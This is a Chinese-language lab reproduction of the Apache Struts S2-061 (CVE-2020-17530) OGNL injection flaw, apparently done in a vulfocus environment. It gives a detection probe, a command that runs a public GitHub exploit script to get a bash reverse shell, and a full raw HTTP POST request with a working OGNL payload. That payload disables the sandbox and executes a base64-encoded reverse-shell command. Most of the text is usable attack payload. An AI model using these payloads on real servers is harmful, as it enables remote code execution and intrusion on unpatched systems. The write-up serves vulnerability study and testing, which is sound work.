S2-061（CVE-2020-17530）漏洞复现

CVE-2020-17530漏洞复现

影响版本：Apache Struts 2.0.0-2.5.25
复现环境：vulfocus

漏洞是否存在

对index.action传入参数进行回显判断

?id=%25{'jack'%2b(2000%2b23).toString()}

如果回显为jack2023那么就代表存在漏洞，执行了里面的代码

然后就是getshell，这里用两种方法

1、使用自动化工具，引用gituhub脚本进行getshell

https://github.com/YanMu2020/s2-062
命令

python s2-061.py --url http://host:port/index.action --cmd "bash -c {echo,(bash反弹shell的base64编码)}|{base64,-d}|{bash,-i}"

反弹成功

2、使用手工进行反弹shell
抓包并反弹shell
tips:这里注意几个细节
首先是POST请求
然后就是Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
最后就是下面的反弹shell的base64编码。

数据包
POST / HTTP/1.1
Host: host:post
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 922

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("bash -c {echo,反弹shell编码}|{base64,-d}|{bash,-i}")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

反弹shell成功